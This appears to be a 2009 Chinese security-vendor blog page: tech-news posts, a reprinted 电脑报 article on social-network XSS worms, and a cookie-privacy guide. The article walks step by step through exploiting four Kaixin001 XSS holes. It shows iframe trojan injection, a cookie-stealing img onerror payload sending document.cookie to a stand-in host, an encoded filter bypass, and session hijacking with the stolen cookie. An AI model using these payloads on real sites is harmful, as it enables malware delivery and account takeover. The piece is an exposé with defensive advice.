3. 请及时更新安天防线2009,以确保您的计算机安全,防止计算机病毒入侵。如未安装安天防线请点击此处(http://www.antiyfx.com/download.htm),免费下载最新版安天防线2009。

2009-09-08

如今浏览器战争几乎打到了胶着的状态,先是Opera仗着欧盟将自己的浏览器挤进了Windows 7欧洲版之中,如今谷歌也和索尼达成协议,今后所有索尼公司出产的电脑之中都会预装谷歌Chrome浏览器。

但是不知道Chrome浏览器是预装到索尼电脑的Windows系统中呢?还是预装到索尼的Linux系统中,如果是预装到Windows系统之中,可能效果并不会像谷歌估计的那么乐观,毕竟索尼不能卸载删除了Windows中内置的IE浏览器,因此即便预装上Chrome,它做多也只能够算是一个替补选手,对于撼动IE的地位几乎没可能。

谷歌也野心十足,在和索尼合作成功后,谷歌打算将这种捆绑模式推而广之,进一步让更多的电脑品牌捆绑Chrome浏览器。不过对于这个模式谷歌绝对要小心一点儿,首先说不定Opera哪天有状告谷歌捆绑销售,另外想必硬件厂商也会心怀顾虑。

话说当年IBM和微软合作,最终促成了这个世界上最大的软件公司,如今虽然谷歌已经是互联网霸主,但是如果它在掌握了浏览器市场进一步进入软件领域,想必也不是所有硬件厂商愿意看到的。

2009-09-07

社交网站遭遇蠕虫危机恐慌

 

当数年前冲击波蠕虫病毒在互联网上所制造破坏和恐惧,刚在中国网民的心中逐渐淡去的时候,从互联网当下最火爆的开心网、MySpace、校内网SNS社交网站不断袭来的蠕虫攻击却开始唤醒那部分尘封的记忆。在2009年过去的八个月中,几乎每个月都有社交网站爆发蠕虫攻击事件,网络安全专家将社交网站蠕虫比作个人隐私大盗,而且可能威胁到的不仅仅是个人隐私……

 

警告:蠕虫在蔓延!

8月25日,一个非常普通的星期二,然而在网络中的这一天,著名的中文SNS网络社区人人网却在经历一场与蠕虫的斗争。一个利用XSS跨站脚本漏洞进行传播的蠕虫正在伪装成为视频,疯狂快速的传播,而这距校内网更名称为人人网仅几天的时间。

这个脚本蠕虫病毒名为伪装在一个音乐视频中,并利用人人网的视频分享功能在用户之间疯狂传播。看似是一则普通Flash动画的视频文件中包含了一段恶意程序,一旦用户打开之后,内嵌在这则动画中的恶意网页会迅速在用户计算机中生成一个脚本程序,删除用户的网络日志,并开始盗用受害者的名义传播给他好友。

然而,这并非个案,早在4月份,拥有最多华人用户的IM软件QQ中的QZone空间就被黑客利用XSS脚本漏洞进行蠕虫散播,最终导致上万用户空间遭到袭击。而更早之前,百度空间也曾被黑客利用跨站脚本漏洞散播蠕虫病毒,近万名用户的百度空间成为了蠕虫的乐园。

这样的情况对于SNS社交网站来说才刚刚开始。进入2009年后透过SNS社交网站漏洞进行蠕虫传播开始越来越多,社交蠕虫几乎在以每月一个的速度诞生传播。不仅是数量上的增加,社交蠕虫也开始变得“贪婪”,蠕虫作者如今已经开始设定蠕虫在套取用户信息后向受害者的好友发送诈骗信息,企图获取钱财。

 

危机:开心网连爆漏洞!

在国内,依靠“争车位”、“朋友买卖”等几个简单的组件和病毒式的传播,开心网以一种不可思议的速度在各个办公室之间蔓延。借此Facebook引领的SNS社交网站也第一次真正地在中国的办公室一族当中获得追捧,成为了国内人气最热的SNS社交网站。

无疑,火爆的人气带来的是也有潜在的危险。

与百度空间、QZone一样,开心网早在今年年初就爆出过可被蠕虫利用的漏洞。不过,开心网仍然存在大量漏洞。本周,《电脑报》在第一时间收到多个开心网漏洞,而这些漏洞全是未公开,仅在黑客圈内部流传的0Day漏洞。

而这些漏洞之中,就存在能够被黑客利用编写社交蠕虫的高危漏洞。对于有经验的黑客,这个高危漏洞可以被他们很轻松地变成具有感染能力的社交网站蠕虫。只不过现在我们仍然无法知道,开心网是否能够及时的修补这些漏洞。

如果漏洞未能够及时修补,那么对于开心网所有的用户而言,这都是一个潜伏的定时炸弹。黑客可以通过编写蠕虫社交蠕虫感染至少数万名用户,获取到他们的个人信息、好友信息,这些信息足以构成一个环环相扣的人际关系网,黑客对于人际关系网又有多种利用方式,贩卖信息,诈骗,构造虚假身份等都可以实现。

这并不是一个悲观的推论,今年1月,美国居民布莱恩的朋友们从带有布莱恩照片的Facebook邮箱的电子邮件中读到,布莱恩出现了问题。在电子邮件中,布莱恩声称他遇到了大麻烦,需要朋友们的帮助。随后至少有一位朋友向他汇钱。然而事实上布莱恩并没有陷入麻烦,也不需要帮助,只是他的网站被网络犯罪分子利用了。

这只是一起针对社交网站Facebook的网络诈骗活动。

今年严重的MySpace蠕虫还导致了MySpace社交网站瘫痪数小时,许多用户反映因感染蠕虫,导致日志等文件被莫名其妙删除。

开心网的多个漏洞目前仍然存在,留给网站管理员修复的时间却要比黑客编写蠕虫的时间要少的多,黑客总会先一步网站掌握相关漏洞信息,这是一场速度与对抗的战争。

 

影响:被放大的蠕虫效应!

利用网站过滤不严,进行恶意的黑客攻击并不是一件新鲜事,但在没有开心网这样的SNS社区之前,利用跨站漏洞发动攻击的黑客最多是在知名网站的网页中挂木马,获取尽量多的肉鸡,或者是制造一串串的弹出窗口这种恶作剧式的玩笑。

SNS社交网站的出现改变了这一切。根据六度分隔理论的假设,世界上所有互不相识的人只需要很少中间人就能建立起联系,而平均只需六个人就可以联系任何两个互不相识的人。

在这个理论上发展处的SNS社交网站就是这样一个层层交织的社会关系网,当用户注册成为SNS社交网站用户的那一刻起,你就与社交网站中的好友建立了一种网状的联系,而这种的网状的联系会通过社区中的资源分享、小游戏等互动要素变得更加的紧密。这实际上是将原来分散的个人用户凝聚到了一起,并且是一个由交织网络的群体,而这个群体对于蠕虫传播而言是最理想的目标人群。

友情改变了一切。在SNS社交网站中不同,由于在SNS社交网站中的好友多数都是在网络之下相互认识的朋友,因此当黑客通过社交网站漏洞释放蠕虫病毒之后,同处在社交网站中的多数人会信任的打开自己好友发送来的短信或者分享的视频等信息,而此时每一个因为信任自己好友而打开带毒信息的人都加入了这条传播病毒的循环之中,成为了病毒的传播者。

从统计角度来看,物以类聚、人以群分。雅虎公司的研究人员几年前发现,如果一个人点击某条网上广告,他或她的聊天密友点击相同广告的几率是其他人的3倍或4倍。这个结论直接证明了朋友们乐于相互分享兴趣。而在SNS中,这成为了病毒传播的杀手锏。

这如同在人群密集处有一个传染性极强的流感患者,只需要很短的时间,通过人与人的接触,所有的人都会感染病毒。以前没有威力的跨站漏洞配合蠕虫在SNS社区中危险性被无限的放大了。

社区蠕虫能够造成的危害最终也可能超乎你的想象,通过SNS网络,一个蠕虫有可能获取你全部的好友圈信息,并冒充你发出各种诈骗信息。同样在SNS网络中,蠕虫还可以利用社会工程学,从你的好友那里骗取有关你的详细信息,让你的好友将这些信息发送到指定地点。而这些关键信息将有可能让黑客复制出你的一切,从身份证到信用卡,SNS蠕虫让社交网络变成一个危险未知的陷阱。

如今,各种各样的SNS网络在互联网这个大舞台上纵横交错,从交换信息到结交朋友,再到各取所好。我们也许从不会从安全角度衡量网络中的好友,但是对于病毒制造者而言,这种网络友情的价值将注定成为他们利用的最佳跳板,也注定SNS社交网站蠕虫将会有增无减。

 

对策:2.0时代的安全新规则

在国内著名安全机构“安天实验室”的安全专家眼中,目前威胁网络社区安全的并不是这些已知的蠕虫病毒,而是那些尚未发现或者已经被极少数黑客掌握的跨站漏洞。

跨站攻击方法自从诞生那天起没有受到足够的重视,对于Web1.0时代的网站来说,哪里出现问题修补哪里的灭火方式就可以足以防范这种漏洞。对黑客而言,在没有社交网站之前也没有理想的利用跨站漏洞攻击手段方,因此是不被人看好的鸡肋。

这直接造成了早期程序员不重视对于网站跨站漏洞的过滤检查。但当网站进入到Web 2.0时代的时候,那些以前不被重视的跨站被激活了,可以互动交互的模式激活了跨站成为蠕虫的特性,而网站此时却发现,自己并不知道还有什么地方存在XSS漏洞。

安天实验室监控显示,Web 2.0时代随着网站的交互性增强,跨站挂马、Cookie截获与Cookie追逐等以前不被视为高威胁或者安全威胁的技术已经开始变危险和泛滥。现今黑客已经开始利用社交网站蠕虫配合Cookie截获篡改获取用户密码好友圈等信息,Cookie截获配合跨站最终脱胎蜕变出了社区蠕虫。

面临这种威胁的并不只有社交网站,博客、微博等一系列的Web 2.0网站几乎都具有高度交互性,这些高度交互性的网站都存在蠕虫等新的安全隐患。因此制定Web 2.0时代的安全新规则将是未来应对网站新威胁的手段。

而作为个体,在新的蠕虫威胁面前,提高电脑的安全防护能力固然重要,同时也要提高安全知识的储备。每一个人都将是与社交蠕虫对抗的堡垒。希望看到,经过冲击波等网络病毒洗礼的网民,并不会因为曾经的记忆更加恐慌,而是能构筑起应对新安全威胁的网络防线,无论社交蠕虫是否真的会席卷网络,都能够正确地看待这次新安全威胁。

 

开心网漏洞解读

在这一次发现的开心网4个漏洞中,全部是因为网站过滤不严而导致。也正是因为这种过滤不严,而网站又由于结构复杂存在大量该类型的漏洞,让黑客可以借题发挥,通过和Cookie截获配合制造出能够引起严重后果的社交蠕虫。

目前,第一个漏洞出在群相册组件处,主要问题是iframe过滤不严;第二个漏洞出在音乐组件专辑名称处,主要问题是iframe也是过滤不严。

第三个漏洞出在音乐组件歌曲注释处,主要问题是iframe和img过滤不严。第四个漏洞出在音乐组件歌词处,主要问题是iframe、img、&#过滤不严,此处对输入的字符的长度没有限制,所以比较适合进行Cookie的窃取。漏洞的利用的代码是”><iframe src=http://www.baidu.com width=500 height=500></iframe>。

安全小百科:跨站漏洞就如同一个商场中没有保安和管理人员一样,在这样一个缺乏有效监管和审查的商场中,自然会有冒充商场人员的骗子混进来摆摊设点,而消费者则会将这些骗子误认为是商场的员工,被这些骗子骗了也会认为是被商场骗了,会将怒气发泄到商场身上。

 

四大开心网漏洞揭秘

群相册组件漏洞

漏洞危害:能用来挂马

漏洞原因:iframe过滤不严

漏洞状况:已通知修改

威胁指数:★★★★

最佳防护组合:卡巴斯基+安天防线

 

漏洞利用:首先,制作一个网页木马。例如下载一款Flash 漏洞生成器,在“生成”中输入木马的地址(该木马已经上传到指定的网站空间中),点击“生成”按钮即可,再将生成的网页木马上传到指定的网站空间中。

然后,注册一个开心网账号,用账号登录后进入群相册,创建一个群相册专辑。在群相册专辑名称处输入代码<iframe src=http://www.baidu.com width=500 height=500></iframe>(图1),点击“确定”按钮,百度就被嵌入到开心网中了(图2)。

接在,将上述代码中的www.baidu.com替换为木马地址,将width(嵌入框架的宽)和height(嵌入框架的高)的值都设为0,就可以挂马了。最后等用户浏览相册或者四处宣传引诱用户浏览相册就可以了。开心网在此处做了代码的长度限制,无法抓取Cookie窃取用户信息。

 

音乐组件专辑名称漏洞

漏洞危害:能用来挂马

漏洞原因:iframe过滤不严

漏洞状况:已通知修改

威胁指数:★★★★

最佳防护组合:卡巴斯基+安天防线

 

漏洞利用:在音乐组件中点击“创建新专辑”,在弹出的对话框中输入专辑名称处输入代码<iframe src=http://www.baidu.com width=500 height=500></iframe>(图3),点击“创建”按钮即可完成新专辑的创建。

点击新建的专辑名,进入播放界面后就会在左边弹出嵌入的百度页面(图4)。同理,如果我们把百度地址换成木马地址,将width和height的值都设为0就可以挂马了。最后等用户浏览音乐专辑或者四处宣传引诱用户浏览音乐专辑就可以了。

音乐组件歌曲注释漏洞

漏洞危害:能用来挂马

漏洞原因:iframe、img过滤不严

漏洞状况:已通知修改

威胁指数:★★

最佳防护组合:卡巴斯基+安天防线

 

漏洞利用:首先,随便上传一首MP3歌曲。点击“音乐”,任意输入一个专辑名称,再点击“创建→上传歌曲”,在此处输入歌曲名称、类型等信息,点击“下一步→继续上传步骤→浏览”,选择一个音乐文件,点击“开始上传”。

然后在注释文本框中输入代码<iframe src=http://www.baidu.com width=500 height=500></iframe>(图5),点击“确定”按钮,百度出现在了开心网的歌词注释处(图6)。同理,把百度地址换成木马地址,将width和height的值都设为0就可以挂马了。最后四处宣传链接,引诱用户点击链接即可激活木马。

 

 

音乐组件歌词漏洞

漏洞危害:能用来挂马、窃取Cookie信息

漏洞原因:iframe、img、&#过滤不严

漏洞状况:已通知修改

威胁指数:★★★★★

最佳防护组合:卡巴斯基+安天防线

 

第一步:进入补充歌词页面,在“LRC歌词”文本框中输入跨站代码<iframe src=http://www.baidu.com width=500 height=500></iframe>,点击“保存”按钮,再播放改音乐就可以看到百度了(图7)

第二步:准备好Cookie截取代码(网上下载),再创建一个名为Cookie.txt的纯文本文件,它的作用是记录已截取的Cookie信息。接下来将这两个文件上传到空间中,这时Cookie截取文件的地址就是http://www.yourname.com/Cookie.asp(yourname为实际域名地址)。

安全小百科:Cookie由服务器端生成,发送给浏览器,浏览器会将Cookie保存到某个目录下的文本文件内,下次请求同一网站时就发送该Cookie给服务器(前提是浏览器设置为启用Cookie)。Cookie名称和值可以由服务器端开发自己定义,这样服务器可以知道该用户是否合法用户以及是否需要重新登录等。

第三步:点击“修改歌曲信息 ”,在修改歌曲信息页面中的歌词处输入代码<img src=”cj.gif”onerror=”document.location=’http://www.yourname.com/Cookie.aspCookie=’+document.Cookie”/> (图8),点击“确定”按钮保存。

再点击歌曲右侧的“给好友点歌”,在弹出的点歌窗口中选择好友(图9),点击“确定”即可。当好友打开歌曲播放页面时,会跳出提示“开心网音乐组件正在维护中,给你带来的不便请谅解”(图10),此时他的Cookie信息已被截获(图11)。

 

安全小百科:要弹出提示窗口,需要把跨站代码转换成十进制输出(开心网过滤了script)。在网上随便找到一款代码转换器,将之前输入的代码转换为<IMG SRC=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#24320&#24515&#32593&#38899&#20048&#32452&#20214&#27491&#22312&#32500&#25252&#20013&#46&#46&#46&#32473&#24744&#24102&#26469&#30340&#19981&#20415&#35831&#35845&#35299&#39&#41>。

最后下载一款可以修改Cookie的浏览器,例如《Cookies浏览器》,打开开心网首页,在登录框处把我们刚刚截取到的Cookie替换到相应位置,然后点击“修改”就可以顺利登录好友的账号了(图12)。

 

我们的建议

相信开心网存在的XSS跨站漏洞不止我们上面了提到的这几个,如何才能查找到此类漏洞呢?除了手动对输入框逐一查找外,其实还有大量的XSS漏洞检测工具可供我们使用,如著名的XSS LFI File Disclosure Scanner、Paros 等,对全站页面结构进行扫描,极有可能发现新的安全漏洞。当然这类工具都是双刃剑,网站管理员可以用它来检测网站安全,黑客也可以用其找出网站漏洞实施攻击。

那么如何才能最大程度的避免出现此类漏洞呢?除了在网站建设初期加强对用户输入内容可靠性的限制管理外,还要做深入细致的检测,最基本的就是对有输入框页面的富文本输入进行代码测试,在测试过程中如页面有任何框架变形或脚本错误提示,即预示着此页面极有可能存在XSS跨站攻击漏洞。

此外,对带参数的链接也要进行参数替换测试,如我们之前报道的赶集网跨站漏洞就存在着对参数过滤不严的问题。同时,最好在网站开发的全程阶段,引入专业的黑盒与白盒测试工具,建立完善的富文本过滤层。相信做到上述这些后,定能极大的增强网站的安全性,做到滴水不漏。

 

苗得雨 CJ也疯狂

(本文已发表在最新一期《电脑报》)

 Cookies是小的数据包,里面包含着关于你网上冲浪习惯的信息,这随后就为因特网上了解cookies的站点所知。Cookie的主要用途是广告代理商用来追踪人口统计,查看某个站点吸引了那种消费者。一些网站还用cookies来保存你最近的帐号信息。这样,当你进入某个 
站点,比如说Amazon.com,而你又在该站点有帐号时,站点就会立刻知道你是谁,自动载入你的个人参数选项。这也就是象Yahoo!这样的站点是如何提供“myYahoo!”这种私人特色服务的。

  象Double-Click和NetGravity等公司都使用cookies来编译关于网上冲浪者的信息,回过头来这又被广告客户用来有目标地投递广告。在最为流行的搜索引擎Yahoo!中,你就可以看到一个采用这种策略的实例,当你第一次连接该站点时,它会显示一个表面看来随机的广告条。在你输入一个单词——比如说“待售书籍”——进行查找之后,广告条会突然开始吹捧Amazon.com。

  如何阻止cookies?

  是否有什么办法可以阻止cookies?当然!只要你使用的是Microsoft Internet Explorer版本3.0或其更高版本就行

  。IE中给出一个选项,能在你从某个站点接收cookie时显示一个警告信息,并且可让你拒绝此cookie。这只需到查看菜单,选中选项……。在选项对话框中,点击高级标签。将列表框向下滚动,把总是接受Cookies选项设为不选中状态。接着再选中接收cookies之前提示。

  对于IE 5.0,则到工具菜单中选中因特网选项……选择安全标签,在自定义级别框上点击。将滑块滚动到Cookies,更改各个选项。

  如果你使用的是Netscape,只要在编辑菜单下选中属性,接着在出现的对话框内选中高级,此后按照同样的步骤进行。

  拒收Cookies

  当IE警告你一个cookie正要被下载时,只需在它询问你是否想将之下载时点击否就可以了。或者,你可以选择禁用所有cookie使用,这样浏览器将再不会接收任何cookies了。在Netscape中也是同样如此。

  一旦你打开cookies警告选项,IE对可能cookie的警告将是如此之频繁,甚至会让人觉得吃惊。事实上,频繁的警告十分烦人,不过至少当一个站点窥视你的信息时你会知道,而不是让所有活动都在后台发生。除此之外还能干些什么?

  除了打开cookies警告选项之外,你也可以到Electronic Frontier Foundation (EFF)页面上,成为其中一员,登记请求以尽力阻止广告代理使用cookies 。但是到目前为止,最好的方法还是打开cookie警告选项,设置好浏览器以防侵入,你会觉得惊奇:究竟有多少因特网网站是在为Madison Avenue当雇佣骗子。

  是否还有其他选择?

  通过在一个硬盘驱动器上查找任何含有单词cookie的文件,就可以将cookie文件从计算机上删除。

  你可以将那些文件拖到回收站或垃圾桶中。可是,如果你删除cookie文件,就有可能会丢失一些设置,譬如说你访问站点的密码。在这种情形下,当你访问这些站点时,IE会提醒你重新输入密码。为了防止一些公司将新的cookie文件放到你的硬件中,你可以选择浏览器中的一个选项,该选项可确保每次当外界试图放置cookie时会先询问你的许可。

 

另一个方法是通过专业反病毒软件查杀,例如安天防线2009、Spybot等杀毒软件都有查杀追踪Cookie的功能。

2009-09-04

微软专卖店:做店员要身体倍儿棒!

微软最近开始为即将开业的专卖店招募店员,一个令人不解的条件是,微软为每个应聘者设定了体力标准,要求店员应聘者能够抬起或运走70斤左右的重物。微软准备在专卖店中卖什么呢?即使是Xbox 360游戏机或者台式电脑,恐怕也没有70斤这么重。

可一想到微软一直有捆绑销售的传统作风,说不定微软这次在专卖店中也会故技重施,将软件捆绑变为专卖店捆绑销售——买Windows送电脑桌,或者10桶食用油?对于那些力量不足,但又想在微软专卖店工作的应聘者,最佳的选择就是竞争一下专卖店经理的职位了,因为经理只需要抬起50斤就可以了。

看来做微软的销售人员不但要牙好,胃口更好,身体倍儿棒,搬啥都行!

 

雅虎:搜索有仇必报 业务见钱即可

雅虎从微软手中领取了大笔搜索业务合作佣金,本想下一步雅虎就可能和微软的必应成为兄弟了,不过最近雅虎公司副总裁却高调对媒体宣称,雅虎不是必应的一部分,而是竞争对手关系。

原来雅虎与微软达成的只是一个为期10年的搜索技术合作授权协议,并没有涉及到公司业务的合作,因此用户最终看到的仍然是雅虎搜索和必应搜索两个网站。而协议还规定将会有400名雅虎员工被派往微软工作,以具体实施双方的合作计划。

微软当年没有花高价购买雅虎,如今推出自己的搜索引擎后又花小钱通过合作协议公开的用雅虎员工为自己服务,显然占够了雅虎的便宜,也难怪雅虎会在背后有意见。

但是雅虎显然现在还是很在乎钱,最近阿里巴巴将口碑网从雅虎中国中分拆到淘宝网,作为雅虎CEO的巴茨女士竟然没有一点儿意见,反而称赞淘宝赚钱多,看来雅虎在被谷歌和微软这两个最有钱的公司折磨后真是看空了一切,现在只要有钱什么都不是问题。

全是钱闹的。

iPhone火了,连谷歌如今都想在iPhone身上小赚一笔,开发了一款名为Voice应用于iPhone手机的语音应用软件。不过谷歌的小算盘迅速的被苹果察觉,Voice成为了一款永远在审核过程中的软件。苹果此举最近惊动了美国联邦通信委员会,并展开了对苹果是否违法的调查。

事情最新的进展是,苹果回应了委员会的调查,说他们并没有拒绝谷歌的这款软件,只不过是仍然在研究这款软件中。苹果也说出了自己对Voice的不满,原来iPhone用户安装了谷歌的这款语音软件后,这款软件会完全替代苹果手机默认的语音系统,让苹果手机变成谷歌手机。

谷歌这个馊主意让苹果无比尴尬,iPhone和谷歌Android现在正在打得一片血红,谷歌推出苹果版Voice让iPhone用户变成自己的用户,苹果自然不会中计,不过如果苹果拒绝谷歌的软件申请,就又为自己戴上了保守垄断的帽子,真是进退两难。恐怕目前苹果唯一能够做的就是开发一款针对谷歌手机操作系统的苹果皮肤,让谷歌用户都变成苹果界面!